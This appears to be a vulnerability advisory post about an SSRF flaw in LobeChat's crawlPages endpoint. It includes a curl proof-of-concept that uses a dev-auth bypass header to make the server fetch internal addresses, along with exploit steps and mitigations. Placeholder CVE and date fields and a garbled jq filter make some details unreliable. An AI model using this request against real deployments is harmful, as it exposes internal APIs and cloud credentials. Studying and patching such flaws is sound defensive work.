Listen to this Post
The CVE-2024-XXXX vulnerability in LobeChat’s `tools.search.crawlPages` tRPC endpoint allows unvalidated server-side requests (SSRF) due to insufficient input sanitization. When a client sends a request containing an array of URLs and specifies the “naive” implementation (impls: ["naive"]), the server’s crawler service passes these URLs directly to the `Crawler.crawl` method. The naive implementation, located in naive.ts, then performs a `fetch(url)` call without any defensive logic to check if the target is an internal network resource. This includes addresses like localhost (127.0.0.1), private IP ranges (e.g., 10.0.0.0/8), or cloud metadata endpoints (169.254.169.254). The flow is: malicious client input -> tRPC router -> crawler service -> naive `fetch()` -> internal resource exposure. In development environments, authentication can be bypassed entirely using a specific header, making exploitation trivial.
Platform: LobeChat
Version: pre-patch
Vulnerability : SSRF
Severity: Critical
date: 2024-XX-XX
Prediction: Patch 2024-09-30
What Undercode Say:
curl -sS -X POST 'http://localhost:3010/trpc/tools/search.crawlPages' \
-H 'Content-Type: application/json' \
-H 'lobe-auth-dev-backend-api: 1' \
--data '{"json":{"urls":["http://localhost:8889/internal-api"],"impls":["naive"]}}' | jq -r '.result.data.json.results[bash].data.content' | jq .
// packages/web-crawler/src/crawImpl/naive.tsL39-L45
const response = await fetch(url, {
method: 'GET',
signal: controller.signal,
...opts,
});
How Exploit:
Bypass auth (dev).
Force naive impl.
Fetch internal endpoints.
Protection from this CVE
Validate all user-supplied URLs.
Block requests to internal IPs.
Implement allow-lists.
Require production authentication.
Impact:
Internal API access.
Cloud metadata leakage.
Lateral movement foothold.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
